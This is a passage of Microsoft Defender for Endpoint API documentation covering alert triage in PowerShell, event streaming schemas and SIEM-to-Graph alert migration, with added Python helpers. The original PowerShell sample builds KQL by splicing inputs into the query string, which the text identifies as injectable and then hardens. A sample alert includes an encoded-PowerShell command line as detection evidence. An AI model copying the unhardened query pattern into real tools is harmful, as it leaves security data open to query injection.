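Pass a real HTTP function (one that adds the Bearer header and raises on non-2xx) as fetch_json and the same code walks the live collection; the loop guard matters because a client that trusts @odata.nextLink blindly can be kept busy forever by a misbehaving endpoint.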

See also
Microsoft Defender for Endpoint APIs

Tip

Do you want to learn more? Engage with the Microsoft Security community in our Tech Community: Microsoft Defender for Endpoint Tech Community.



Microsoft Defender for Endpoint APIs using PowerShell
Article • 11/30/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender for Business

Important

Advanced hunting capabilities are not included in Defender for Business.

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Note

If you are a US Government customer, please use the URIs listed in Microsoft Defender for Endpoint for US Government customers.

Tip

For better performance, use the API server closest to your geographic location:

api-us.securitycenter.microsoft.com
api-eu.securitycenter.microsoft.com
api-uk.securitycenter.microsoft.com
api-au.securitycenter.microsoft.com

This article walks through a full scenario that uses multiple Defender for Endpoint APIs.

The PowerShell samples in this section:

Retrieve a token
Use the token to retrieve the latest alerts in Microsoft Defender for Endpoint
For each alert that has medium or high severity and is still open, check how many times the device has connected to a suspicious URL

Prerequisite: You first need to create an app.

Preparation instructions
Open a PowerShell window.
If your execution policy doesn't allow you to run the script, you can relax it for the current process only, which avoids weakening the policy machine-wide:

Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope Process

For more information, see PowerShell documentation

Get token
Run the following, after setting these variables:

$tenantId: ID of the tenant on behalf of which you want to run the query (that is, the query is run on the data of this tenant)

$appId: ID of your Microsoft Entra app (the app needs the 'Run advanced queries' permission for the query step and an alert-reading permission such as Alert.Read.All for the alert listing step)

$appSecret: Secret of your Microsoft Entra app (treat it like a password: don't commit it to source control; prefer reading it from a secret store or a protected environment variable)

$suspiciousUrl: The URL to look for in the devices' network events

PowerShell

$tenantId = '00000000-0000-0000-0000-000000000000' # Paste your own tenant ID here
$appId = '11111111-1111-1111-1111-111111111111' # Paste your own app ID here
$appSecret = '22222222-2222-2222-2222-222222222222' # Paste your own app secret here (never commit a real secret)
$suspiciousUrl = 'www.suspiciousUrl.com' # Paste your own URL here

# Acquire an app-only (client credentials) token for the Defender for Endpoint API
$resourceAppIdUri = 'https://securitycenter.onmicrosoft.com/windowsatpservice'
$oAuthUri = "https://login.microsoftonline.com/$tenantId/oauth2/token"
$authBody = [Ordered] @{
    resource      = "$resourceAppIdUri"
    client_id     = "$appId"
    client_secret = "$appSecret"
    grant_type    = 'client_credentials'
}
$authResponse = Invoke-RestMethod -Method Post -Uri $oAuthUri -Body $authBody -ErrorAction Stop
$aadToken = $authResponse.access_token

# Get the latest alerts
$alertUrl = "https://api.securitycenter.microsoft.com/api/alerts?`$top=10"
$headers = @{
    'Content-Type' = 'application/json'
    Accept         = 'application/json'
    Authorization  = "Bearer $aadToken"
}
$alertResponse = Invoke-WebRequest -Method Get -Uri $alertUrl -Headers $headers -ErrorAction Stop
$alerts = ($alertResponse | ConvertFrom-Json).value

# Collect the devices behind open, medium/high severity alerts (each device once)
$machinesToInvestigate = New-Object System.Collections.ArrayList

foreach ($alert in $alerts)
{
    #echo $alert.id $alert.machineId $alert.severity $alert.status

    $isSevereAlert = $alert.severity -in 'Medium', 'High'
    $isOpenAlert = $alert.status -in 'InProgress', 'New'
    if ($isOpenAlert -and $isSevereAlert)
    {
        if (-not $machinesToInvestigate.Contains($alert.machineId))
        {
            $machinesToInvestigate.Add($alert.machineId) > $null
        }
    }
}

# Build a quoted, comma-separated list of device IDs for the KQL 'in' operator
$commaSeparatedMachines = '"{0}"' -f ($machinesToInvestigate -join '","')

# Count connections from those devices to the suspicious URL.
# These are the legacy table and column names; if your tenant rejects them,
# use the current schema names DeviceNetworkEvents, DeviceId and RemoteUrl instead.
$query = "NetworkCommunicationEvents
| where MachineId in ($commaSeparatedMachines)
| where RemoteUrl == `"$suspiciousUrl`"
| summarize ConnectionsCount = count() by MachineId"

$queryUrl = "https://api.securitycenter.microsoft.com/api/advancedqueries/run"

$queryBody = ConvertTo-Json -InputObject @{ 'Query' = $query }

$queryResponse = Invoke-WebRequest -Method Post -Uri $queryUrl -Headers $headers -Body $queryBody -ErrorAction Stop
$response = ($queryResponse | ConvertFrom-Json).Results
$response
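
The script splices $suspiciousUrl and the device IDs straight into the KQL string, so whatever supplies those values can also supply KQL. The following Python is an added example, not part of the documentation's sample: it performs the same triage of the alert list and builds the same query, but validates the device IDs, quotes the URL as a KQL string literal, and refuses to build an empty `in ()` list. It uses the current Advanced Hunting names DeviceNetworkEvents, DeviceId and RemoteUrl (an assumption about your tenant's schema, replacing the legacy names in the script); SAMPLE_ALERTS is constructed data shaped like /api/alerts output, not a real response.

```python
"""Hardened version of the script's triage and query-building steps.

Added example, not the page's own code. Uses the current Advanced Hunting
schema names (DeviceNetworkEvents, DeviceId, RemoteUrl), which replaced the
legacy names in the PowerShell sample; SAMPLE_ALERTS is constructed data
shaped like the `value` array of GET /api/alerts, not a real response.
"""
import json
import re

DEVICE_ID_RE = re.compile(r"[0-9a-f]{40}")  # Defender device IDs: 40 hex chars
SEVERE = {"Medium", "High"}
OPEN = {"New", "InProgress"}


def devices_to_investigate(alerts):
    """Unique device IDs behind open medium/high alerts, in first-seen order."""
    seen = []
    for alert in alerts:
        if alert.get("severity") in SEVERE and alert.get("status") in OPEN:
            device_id = alert.get("machineId")
            if device_id and device_id not in seen:
                seen.append(device_id)
    return seen


def kql_string(value):
    """Quote a value as a KQL double-quoted string literal.

    The PowerShell sample interpolates $suspiciousUrl directly; a value
    containing a double quote would close the literal and let the caller
    append arbitrary KQL, reading any table the app's permission allows.
    """
    if not isinstance(value, str) or not value.isprintable():
        raise ValueError("only printable strings can be embedded in KQL")
    return '"' + value.replace("\\", "\\\\").replace('"', '\\"') + '"'


def connection_count_query(device_ids, suspicious_url):
    """KQL counting connections from each listed device to suspicious_url."""
    if not device_ids:
        # The sample would emit `in ("")`, a query that silently matches nothing.
        raise ValueError("no devices to investigate")
    for device_id in device_ids:
        if not DEVICE_ID_RE.fullmatch(device_id):
            raise ValueError(f"not a device id: {device_id!r}")
    id_list = ", ".join(kql_string(d) for d in device_ids)
    return (
        "DeviceNetworkEvents\n"
        f"| where DeviceId in ({id_list})\n"
        f"| where RemoteUrl == {kql_string(suspicious_url)}\n"
        "| summarize ConnectionsCount = count() by DeviceId"
    )


def advanced_query_body(query):
    """JSON body for POST /api/advancedqueries/run."""
    return json.dumps({"Query": query})


# Constructed alerts; the device IDs are the ones used in the page's samples.
DEV_A = "1e5bc9d7e413ddd7902c2932e418702b84d0cc07"
DEV_B = "f46b9bb259ed4a7fb9981b73510e3cc7aa81ec1f"
SAMPLE_ALERTS = [
    {"id": "alert-1", "machineId": DEV_A, "severity": "High", "status": "New"},
    {"id": "alert-2", "machineId": DEV_A, "severity": "Medium", "status": "InProgress"},
    {"id": "alert-3", "machineId": DEV_B, "severity": "Low", "status": "New"},
    {"id": "alert-4", "machineId": DEV_B, "severity": "High", "status": "Resolved"},
]

if __name__ == "__main__":
    ids = devices_to_investigate(SAMPLE_ALERTS)
    print(advanced_query_body(connection_count_query(ids, "www.suspiciousUrl.com")))
```

The body returned by advanced_query_body is what the script posts with the same Bearer header; the difference is only that the query text can no longer be shaped by its inputs.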

See also
Microsoft Defender for Endpoint APIs
Advanced Hunting API
Advanced Hunting using Python


Raw Data Streaming API
Article • 12/13/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender for Business

Tip

For the full data streaming experience available, see Stream Microsoft Defender XDR events. If you're using Microsoft Defender for Business, see Use the streaming API with Microsoft Defender for Business.

Want to experience Defender for Endpoint? Sign up for a free trial.

Stream Advanced Hunting events to Event Hubs and/or Azure storage account
Microsoft Defender for Endpoint supports streaming events available through Advanced Hunting to an Event Hubs and/or Azure storage account.

In this section

Topic | Description
Stream Microsoft Defender for Endpoint events to Azure Event Hubs | Learn about enabling the streaming API in your tenant and configuring Defender for Endpoint to stream Advanced Hunting events to Event Hubs.
Stream Defender for Endpoint events to your Azure storage account | Learn about enabling the streaming API in your tenant and configuring Defender for Endpoint to stream Advanced Hunting events to your Azure storage account.

Related topics
Stream Microsoft Defender XDR events | Microsoft Learn

Overview of Advanced Hunting

Azure Event Hubs documentation

Azure Storage Account documentation


Configure Microsoft Defender for Endpoint to stream Advanced Hunting events to your Azure Event Hubs
Article • 10/24/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2

Note

For the full data streaming experience available, please visit Stream Microsoft Defender XDR events | Microsoft Learn.

Want to experience Defender for Endpoint? Sign up for a free trial.

Before you begin

1. Create an event hub in your tenant.

2. Sign in to your Azure tenant, go to Subscriptions > Your subscription > Resource Providers > Register to Microsoft.insights.

Enable raw data streaming

1. Sign in to the Microsoft Defender portal as a Global Administrator or Security Administrator.

2. Go to the Data export settings page in the Microsoft Defender portal.

3. Click on Add data export settings.

4. Choose a name for your new settings.

5. Choose Forward events to Azure Event Hubs.

6. Type your Event Hubs name and your Event Hubs resource ID.

Note

Leaving the Event Hubs name empty creates an event hub for each category in the selected namespace. Event Hubs namespaces have a limit of 10 event hubs if you are not using a Dedicated Event Hubs Cluster.

To get your Event Hubs resource ID, go to your Event Hubs namespace page in the Azure portal > Properties tab > copy the text under Resource ID.

7. Choose the events you want to stream and click Save.

The schema of the events in Azure Event Hubs

JSON

{
  "records": [
    {
      "time": "<The time WDATP received the event>",
      "tenantId": "<The Id of the tenant that the event belongs to>",
      "category": "<The Advanced Hunting table name with 'AdvancedHunting-' prefix>",
      "properties": { <WDATP Advanced Hunting event as Json> }
    }
    ...
  ]
}

Each message in Azure Event Hubs contains a list of records.

Each record contains the event name (category), the time Microsoft Defender for Endpoint received the event, the tenant it belongs to (you only get events from your tenant), and the event itself in JSON format in a property called "properties".

For more information about the schema of Microsoft Defender for Endpoint
events, see Advanced Hunting overview.

In Advanced Hunting, the DeviceInfo table has a column named MachineGroup which contains the group of the device. Here every event is decorated with this column as well. See Device Groups for more information.

Note

Device group creation is supported in Defender for Endpoint Plan 1 and Plan 2.

Data types mapping

To get the data types for event properties, do the following:

1. Sign in to Microsoft Defender XDR and go to the Advanced Hunting page.

2. Run the following query, replacing {EventType} with the table name, to get the data types mapping for that event:

Kusto

{EventType}
| getschema
| project ColumnName, ColumnType

For example, for the DeviceInfo event:

Kusto

DeviceInfo
| getschema
| project ColumnName, ColumnType


Related topics
Stream Microsoft Defender XDR events | Microsoft Learn

Overview of Advanced Hunting

Microsoft Defender for Endpoint streaming API

Stream Microsoft Defender for Endpoint events to your Azure storage account

Azure Event Hubs documentation

Troubleshoot connectivity issues - Azure Event Hubs


Configure Microsoft Defender for Endpoint to stream Advanced Hunting events to your Storage account
Article • 02/23/2024

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2

Note

For the full data streaming experience available, please visit Stream Microsoft Defender XDR events | Microsoft Learn.

Want to experience Defender for Endpoint? Sign up for a free trial.

Before you begin

1. Create a Storage account in your tenant.

2. Sign in to your Azure tenant, go to Subscriptions > Your subscription > Resource Providers > Register to Microsoft.insights.

Enable raw data streaming

1. Sign in to the Microsoft Defender portal as a Global Administrator or Security Administrator.

2. Go to the Data export settings page in Microsoft Defender XDR.

3. Select Add data export settings.

4. Choose a name for your new settings.

5. Choose Forward events to Azure Storage.

6. Type your Storage Account Resource ID. In order to get your Storage Account
Resource ID, go to your Storage account page on Azure portal > properties tab
> copy the text under Storage account resource ID:

7. Choose the events you want to stream and select Save.

The schema of the events in the Storage account
A blob container is created for each event type.

The schema of each row in a blob is the following JSON:

JSON

{
  "time": "<The time WDATP received the event>",
  "tenantId": "<Your tenant ID>",
  "category": "<The Advanced Hunting table name with 'AdvancedHunting-' prefix>",
  "properties": { <WDATP Advanced Hunting event as Json> }
}

Each blob contains multiple rows.

Each row contains the event name (category), the time Defender for Endpoint received the event, the tenant it belongs to (you get events only from your tenant), and the event itself in JSON format in a property called "properties".

For more information about the schema of Microsoft Defender for Endpoint
events, see Advanced Hunting overview.

In Advanced Hunting, the DeviceInfo table has a column named MachineGroup which contains the group of the device. Here, every event is decorated with this column as well. For more information, see Device Groups.
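
The Event Hubs envelope (a message carrying a `records` array) and the storage blob format (one JSON object per row) wrap the same record, so one consumer can handle both. The following Python is an added example, not code from the Defender for Endpoint documentation or from the streaming feature itself: it unwraps both shapes, rejects records whose tenantId or category is not what the consumer expects, strips the AdvancedHunting- prefix to recover the table name, and tallies events by the MachineGroup column that every streamed event carries. The sample records and the tenant ID are constructed, not captured from a real stream.

```python
"""Parse streamed Advanced Hunting records from Event Hubs or a Storage account.

Added example, not the page's own code. The two envelope shapes follow the
schemas documented for Event Hubs (message with a `records` list) and Storage
(one JSON object per line in a blob). SAMPLE_* below are constructed records.
"""
import json
from collections import Counter

PREFIX = "AdvancedHunting-"


def parse_eventhub_message(body):
    """Return the list of records carried by one Event Hubs message."""
    message = json.loads(body)
    records = message.get("records")
    if not isinstance(records, list):
        raise ValueError("Event Hubs message has no 'records' array")
    return records


def parse_storage_blob(text):
    """Return the records in a storage blob: one JSON object per non-empty line."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def normalize(record, expected_tenant):
    """Check and unwrap one record into (table, time, properties).

    The service only streams your own tenant's events, but a consumer that
    checks tenantId anyway fails loudly if it is ever pointed at the wrong
    hub or handed a forged message.
    """
    if record.get("tenantId") != expected_tenant:
        raise ValueError(f"unexpected tenantId {record.get('tenantId')!r}")
    category = record.get("category", "")
    if not category.startswith(PREFIX):
        raise ValueError(f"unexpected category {category!r}")
    props = record.get("properties")
    if not isinstance(props, dict):
        raise ValueError("record has no 'properties' object")
    return category[len(PREFIX):], record["time"], props


def events_by_table(records, expected_tenant):
    """Group unwrapped events by Advanced Hunting table name."""
    grouped = {}
    for rec in records:
        table, _time, props = normalize(rec, expected_tenant)
        grouped.setdefault(table, []).append(props)
    return grouped


def machine_group_counts(records, expected_tenant):
    """Count events per MachineGroup, the device-group column added to every event."""
    counts = Counter()
    for rec in records:
        _table, _time, props = normalize(rec, expected_tenant)
        counts[props.get("MachineGroup", "<none>")] += 1
    return dict(counts)


TENANT = "00000000-0000-0000-0000-000000000000"  # constructed tenant ID
_REC1 = {"time": "2024-01-01T00:00:00Z", "tenantId": TENANT,
         "category": "AdvancedHunting-DeviceInfo",
         "properties": {"DeviceName": "mymachine1.contoso.com", "OSPlatform": "Windows10",
                        "MachineGroup": "The-A-Team"}}
_REC2 = {"time": "2024-01-01T00:00:05Z", "tenantId": TENANT,
         "category": "AdvancedHunting-DeviceNetworkEvents",
         "properties": {"DeviceName": "mymachine1.contoso.com", "RemoteUrl": "www.suspiciousUrl.com",
                        "MachineGroup": "The-A-Team"}}
_REC3 = {"time": "2024-01-01T00:00:09Z", "tenantId": TENANT,
         "category": "AdvancedHunting-DeviceInfo",
         "properties": {"DeviceName": "desktop-39g9tgl", "OSPlatform": "Windows10",
                        "MachineGroup": "Servers"}}

SAMPLE_EVENTHUB_MESSAGE = json.dumps({"records": [_REC1, _REC2]})
SAMPLE_STORAGE_BLOB = "\n".join(json.dumps(r) for r in (_REC1, _REC2, _REC3)) + "\n"

if __name__ == "__main__":
    recs = parse_eventhub_message(SAMPLE_EVENTHUB_MESSAGE) + parse_storage_blob(SAMPLE_STORAGE_BLOB)
    print(machine_group_counts(recs, TENANT))
```

In a real consumer the expected tenant ID comes from configuration, and the table name returned by normalize selects the parser or the destination table for the event's properties.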
Note

Device group creation is supported in Defender for Endpoint Plan 1 and Plan 2.

Data types mapping

To get the data types for event properties, do the following:

1. Sign in to Microsoft Defender XDR and go to the Advanced Hunting page.

2. Run the following query, replacing {EventType} with the table name, to get the data types mapping for that event:

Kusto

{EventType}
| getschema
| project ColumnName, ColumnType

For example, for the DeviceInfo event:

Kusto

DeviceInfo
| getschema
| project ColumnName, ColumnType


Related articles
Stream Microsoft Defender XDR events | Microsoft Learn

Overview of Advanced Hunting

Microsoft Defender for Endpoint Streaming API

Stream Microsoft Defender for Endpoint events to your Azure storage account

Azure Storage Account documentation


Migrate from the MDE SIEM API to the Microsoft Defender XDR alerts API
Article • 02/16/2024

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Use the new Microsoft Defender XDR API for all your alerts
The Microsoft Defender XDR alerts API, released to public preview in Microsoft Graph, is the official and recommended API for customers migrating from the SIEM API. This API enables customers to work with alerts across all Microsoft Defender XDR products using a single integration. The new API was expected to reach general availability (GA) by Q1 CY 2023.

The SIEM API was deprecated on December 31, 2023. It's declared "deprecated," not "retired": the SIEM API remains available to existing customers, but it's only supported for security-related fixes.

Effective December 31, 2024, three years after the original deprecation announcement, we reserve the right to turn off the SIEM API without further notice.

For additional information about the new APIs, see the blog announcement: The new
Microsoft Defender XDR APIs in Microsoft Graph are now available in public preview!

API documentation: Use the Microsoft Graph security API - Microsoft Graph

If you're a customer using the SIEM API, we strongly recommend planning and
executing the migration. This article includes information about the options available to
migrate to a supported capability:

1. Pulling MDE alerts into an external system (SIEM/SOAR).

2. Calling the Microsoft Defender XDR alerts API directly.

Read about the new Microsoft Defender XDR alerts and incidents API
Pulling Defender for Endpoint alerts into an external system
If you're pulling Defender for Endpoint alerts into an external system, there are several supported options that give organizations the flexibility to work with the solution of their choice:

1. Microsoft Sentinel is a scalable, cloud-native SIEM and security orchestration, automation, and response (SOAR) solution. It delivers intelligent security analytics and threat intelligence across the enterprise, providing a single solution for attack detection, threat visibility, proactive hunting, and threat response. The Microsoft Defender XDR connector allows customers to easily pull in all their incidents and alerts from all Microsoft Defender XDR products. To learn more about the integration, see Microsoft Defender XDR integration with Microsoft Sentinel.

2. IBM Security QRadar SIEM provides centralized visibility and intelligent security analytics to identify and prevent threats and vulnerabilities from disrupting business operations. The QRadar SIEM team has released a new DSM that is integrated with the new Microsoft Defender XDR alerts API to pull in Microsoft Defender for Endpoint alerts. New customers are welcome to take advantage of the new DSM. Learn more about the new DSM and how to migrate to it at Microsoft Defender XDR - IBM Documentation.

3. Splunk SOAR helps customers orchestrate workflows and automate tasks in seconds to work smarter and respond faster. Splunk SOAR is integrated with the new Microsoft Defender XDR APIs, including the alerts API. For more information, see Microsoft Defender XDR | Splunkbase.

Other integrations are listed in Technological partners of Microsoft Defender XDR, or contact your SIEM / SOAR provider to learn about the integrations they provide.

Calling the Microsoft Defender XDR alerts API directly

The following table maps each SIEM API property to its Microsoft Defender XDR alerts API counterpart ("->" means mapped, "X" means not available in the new API):

SIEM API property | Mapping | Microsoft Defender XDR alert API property
AlertTime | -> | createdDateTime
ComputerDnsName | -> | evidence/deviceEvidence: deviceDnsName
AlertTitle | -> | title
Category | -> | category
Severity | -> | severity
AlertId | -> | id
Actor | -> | actorDisplayName
LinkToWDATP | -> | alertWebUrl
IocName | X | IoC fields not supported
IocValue | X | IoC fields not supported
CreatorIocName | X | IoC fields not supported
CreatorIocValue | X | IoC fields not supported
Sha1 | -> | evidence/fileEvidence/fileDetails: sha1 (or evidence/processEvidence/imageFile: sha1)
FileName | -> | evidence/fileEvidence/fileDetails: fileName (or evidence/processEvidence/imageFile: fileName)
FilePath | -> | evidence/fileEvidence/fileDetails: filePath (or evidence/processEvidence/imageFile: filePath)
IPAddress | -> | evidence/ipEvidence: ipAddress
URL | -> | evidence/urlEvidence: url
IoaDefinitionId | -> | detectorId
UserName | -> | evidence/userEvidence/userAccount: accountName
AlertPart | X | Obsolete (Defender for Endpoint alerts are atomic/complete records that are updatable, while SIEM API records were immutable records of detections)
FullId | X | IoC fields not supported
LastProcessedTimeUtc | -> | lastActivityDateTime
ThreatCategory | -> | mitreTechniques []
ThreatFamilyName | -> | threatFamilyName
ThreatName | -> | threatDisplayName
RemediationAction | -> | evidence: remediationStatus
RemediationIsSuccess | -> | evidence: remediationStatus (implied)
Source | -> | detectionSource (use with serviceSource: microsoftDefenderForEndpoint)
Md5 | X | Not supported
Sha256 | -> | evidence/fileEvidence/fileDetails: sha256 (or evidence/processEvidence/imageFile: sha256)
WasExecutingWhileDetected | -> | evidence/processEvidence: detectionStatus
UserDomain | -> | evidence/userEvidence/userAccount: domainName
LogOnUsers | -> | evidence/deviceEvidence: loggedOnUsers []
MachineDomain | -> | Included in evidence/deviceEvidence: deviceDnsName
MachineName | -> | Included in evidence/deviceEvidence: deviceDnsName
InternalIPV4List | X | Not supported
InternalIPV6List | X | Not supported
FileHash | -> | Use sha1 or sha256
DeviceID | -> | evidence/deviceEvidence: mdeDeviceId
MachineGroup | -> | evidence/deviceEvidence: rbacGroupName
Description | -> | description
DeviceCreatedMachineTags | -> | evidence: tags [] (for deviceEvidence)
CloudCreatedMachineTags | -> | evidence: tags [] (for deviceEvidence)
CommandLine | -> | evidence/processEvidence: processCommandLine
IncidentLinkToWDATP | -> | incidentWebUrl
ReportId | X | Obsolete (Defender for Endpoint alerts are atomic/complete records that are updatable, while SIEM API records were immutable records of detections)
LinkToMTP | -> | alertWebUrl
IncidentLinkToMTP | -> | incidentWebUrl
ExternalId | X | Obsolete
IocUniqueId | X | IoC fields not supported
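
A SIEM parser written against the SIEM API field names can keep working if a translation layer applies the table above to each Graph alert before it is handed over. The following Python is an added example, not code from the documentation or from Microsoft Graph: it maps the supported rows of the table, splits deviceDnsName into MachineName and MachineDomain, takes file details from fileEvidence first and from processEvidence.imageFile otherwise, and refuses alerts whose serviceSource isn't microsoftDefenderForEndpoint. Matching evidence items on their @odata.type, reading detectionStatus and remediationStatus as booleans, and SAMPLE_ALERT itself are assumptions made for the example.

```python
"""Translate a Microsoft Graph alerts_v2 alert into the SIEM API's field names.

Added example, not the page's code: it implements the mapping table above so
an existing SIEM parser keyed on the old names keeps working. Evidence items
are matched on their @odata.type value (an assumption about the payload
shape); SAMPLE_ALERT is constructed, not a captured alert.
"""

# Top-level scalar fields: (SIEM API name, Graph alert property).
SCALAR_MAP = [
    ("AlertTime", "createdDateTime"), ("AlertTitle", "title"), ("Category", "category"),
    ("Severity", "severity"), ("AlertId", "id"), ("Actor", "actorDisplayName"),
    ("LinkToWDATP", "alertWebUrl"), ("LinkToMTP", "alertWebUrl"),
    ("IncidentLinkToWDATP", "incidentWebUrl"), ("IncidentLinkToMTP", "incidentWebUrl"),
    ("IoaDefinitionId", "detectorId"), ("LastProcessedTimeUtc", "lastActivityDateTime"),
    ("ThreatCategory", "mitreTechniques"), ("ThreatFamilyName", "threatFamilyName"),
    ("ThreatName", "threatDisplayName"), ("Source", "detectionSource"),
    ("Description", "description"),
]


def _evidence(alert, kind):
    """All evidence items of one kind, e.g. 'deviceEvidence'."""
    want = f"#microsoft.graph.security.{kind}"
    return [e for e in alert.get("evidence", []) if e.get("@odata.type") == want]


def is_mde_alert(alert):
    """The SIEM API only carried Defender for Endpoint alerts, so filter on serviceSource."""
    return alert.get("serviceSource") == "microsoftDefenderForEndpoint"


def to_siem_shape(alert):
    """Return a dict keyed by SIEM API property names (unsupported ones are omitted)."""
    if not is_mde_alert(alert):
        raise ValueError("not a Defender for Endpoint alert")
    out = {siem: alert[graph] for siem, graph in SCALAR_MAP if graph in alert}

    for dev in _evidence(alert, "deviceEvidence")[:1]:  # SIEM API rows named one device
        dns = dev.get("deviceDnsName") or ""
        out["ComputerDnsName"] = dns
        out["MachineName"], _, out["MachineDomain"] = dns.partition(".")
        out["DeviceID"] = dev.get("mdeDeviceId")
        out["MachineGroup"] = dev.get("rbacGroupName")
        out["LogOnUsers"] = [u.get("accountName") for u in dev.get("loggedOnUsers", [])]
        out["DeviceCreatedMachineTags"] = out["CloudCreatedMachineTags"] = dev.get("tags", [])
        out["RemediationAction"] = dev.get("remediationStatus")
        # Assumption: the table says success is "implied" by remediationStatus.
        out["RemediationIsSuccess"] = dev.get("remediationStatus") == "remediated"

    file_details = None
    for f in _evidence(alert, "fileEvidence")[:1]:
        file_details = f.get("fileDetails")
    for p in _evidence(alert, "processEvidence")[:1]:
        file_details = file_details or p.get("imageFile")
        out["CommandLine"] = p.get("processCommandLine")
        # Assumption: 'detected' means the process ran; 'blocked'/'prevented' mean it did not.
        out["WasExecutingWhileDetected"] = p.get("detectionStatus") == "detected"
    if file_details:
        out["Sha1"] = file_details.get("sha1")
        out["Sha256"] = file_details.get("sha256")
        out["FileHash"] = file_details.get("sha256") or file_details.get("sha1")
        out["FileName"] = file_details.get("fileName")
        out["FilePath"] = file_details.get("filePath")

    for ip in _evidence(alert, "ipEvidence")[:1]:
        out["IPAddress"] = ip.get("ipAddress")
    for url in _evidence(alert, "urlEvidence")[:1]:
        out["URL"] = url.get("url")
    for user in _evidence(alert, "userEvidence")[:1]:
        account = user.get("userAccount", {})
        out["UserName"] = account.get("accountName")
        out["UserDomain"] = account.get("domainName")
    return out


SAMPLE_ALERT = {  # constructed, shaped like a Graph alerts_v2 alert
    "id": "constructed-alert-1", "title": "Suspicious process launched",
    "category": "Execution", "severity": "high",
    "serviceSource": "microsoftDefenderForEndpoint", "detectionSource": "antivirus",
    "detectorId": "11111111-1111-1111-1111-111111111111",
    "createdDateTime": "2021-04-05T12:00:00Z", "lastActivityDateTime": "2021-04-05T12:05:00Z",
    "alertWebUrl": "https://security.microsoft.com/alerts/constructed-alert-1",
    "incidentWebUrl": "https://security.microsoft.com/incidents/1",
    "mitreTechniques": ["T1059.001"],
    "evidence": [
        {"@odata.type": "#microsoft.graph.security.deviceEvidence",
         "deviceDnsName": "mymachine1.contoso.com",
         "mdeDeviceId": "1e5bc9d7e413ddd7902c2932e418702b84d0cc07",
         "rbacGroupName": "The-A-Team", "remediationStatus": "remediated",
         "tags": ["Tag1", "Tag2"],
         "loggedOnUsers": [{"accountName": "analyst", "domainName": "contoso"}]},
        {"@odata.type": "#microsoft.graph.security.processEvidence",
         "processCommandLine": "powershell.exe -enc AAAA", "detectionStatus": "detected",
         "imageFile": {"fileName": "powershell.exe",
                       "filePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
                       "sha1": "a" * 40, "sha256": "b" * 64}},
        {"@odata.type": "#microsoft.graph.security.urlEvidence", "url": "www.suspiciousUrl.com"},
        {"@odata.type": "#microsoft.graph.security.userEvidence",
         "userAccount": {"accountName": "analyst", "domainName": "contoso"}},
    ],
}

if __name__ == "__main__":
    for key, value in sorted(to_siem_shape(SAMPLE_ALERT).items()):
        print(f"{key}: {value}")
```

Fields the table marks X (Md5, the IoC fields, InternalIPV4List and the rest) are deliberately absent from the output, so a downstream parser that still requires them fails at the translation layer rather than silently receiving empty strings.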

Ingest alerts using security information and events management (SIEM) tools

Note

A Microsoft Defender for Endpoint alert is composed of one or more suspicious or malicious events that occurred on the device and their related details. The Microsoft Defender for Endpoint Alert API is the latest API for alert consumption and contains a detailed list of related evidence for each alert. For more information, see Alert methods and properties and List alerts.

Microsoft Defender for Endpoint supports security information and event management
(SIEM) tools ingesting information from your enterprise tenant in Microsoft Entra ID
using the OAuth 2.0 authentication protocol for a registered Microsoft Entra application
representing the specific SIEM solution or connector installed in your environment.

For more information, see:

Microsoft Defender for Endpoint APIs license and terms of use
Access the Microsoft Defender for Endpoint APIs
Hello World example (describes how to register an application in Microsoft Entra ID)
Get access with application context
Microsoft Defender XDR SIEM integration


Troubleshoot SIEM tool integration issues
Article • 11/15/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Note

Try our new APIs using the Microsoft Graph security API. Find out more at: Use the Microsoft Graph security API - Microsoft Graph | Microsoft Learn.

Want to experience Defender for Endpoint? Sign up for a free trial.

Note

The new Microsoft Defender XDR alerts API, released to public preview in Microsoft Graph, is the official and recommended API for customers migrating from the SIEM API. See Migrate from the MDE SIEM API to the Microsoft Defender XDR alerts API.

You might need to troubleshoot issues while pulling detections in your SIEM tools.

This page provides detailed steps to troubleshoot issues you might encounter.

Learn how to get a new client secret

If your client secret expires, or you've misplaced the copy provided when you were enabling the SIEM tool application, you'll need to get a new secret.

1. Sign in to the Azure portal.

2. Select Microsoft Entra ID.

3. Select your tenant.

4. Select App registrations. Then in the applications list, select the application.

5. Select the Certificates & secrets section, select New client secret, then provide a description and specify the validity duration (keep it short and schedule the rotation before it expires).

6. Select Add. The secret value is displayed once.

7. Copy the value and store it in a safe place (a secret store, not a script or a wiki page); it can't be retrieved again later.

Error when getting a refresh access token

If you encounter an error when trying to get a refresh token when using the threat intelligence API or SIEM tools, you'll need to add a reply URL for the relevant application in Microsoft Entra ID.

1. Sign in to the Azure portal.

2. Select Microsoft Entra ID.

3. Select your tenant.

4. Select App registrations. Then in the applications list, select the application.

5. Add the following URL:

For the European Union: https://winatpmanagement-eu.securitycenter.windows.com/UserAuthenticationCallback

For the United Kingdom: https://winatpmanagement-uk.securitycenter.windows.com/UserAuthenticationCallback

For the United States: https://winatpmanagement-us.securitycenter.windows.com/UserAuthenticationCallback

6. Select Save.

Error while enabling the SIEM connector application
If you encounter an error when trying to enable the SIEM connector application, check the pop-up blocker settings of your browser. It might be blocking the new window that opens when you enable the capability.

Related topics
Use the Microsoft Graph security API - Microsoft Graph | Microsoft Learn

Pull detections to your SIEM tools


Partner applications in Microsoft Defender for Endpoint
Article • 08/23/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Defender for Endpoint supports third-party applications that enhance the detection, investigation, and threat intelligence capabilities of the platform.

Support for third-party solutions helps to further streamline, integrate, and orchestrate defenses from other vendors with Microsoft Defender for Endpoint, enabling security teams to respond more effectively to modern threats.

Microsoft Defender for Endpoint integrates with existing security solutions, including:

SIEM
Ticketing and IT service management solutions
Managed security service providers (MSSP)
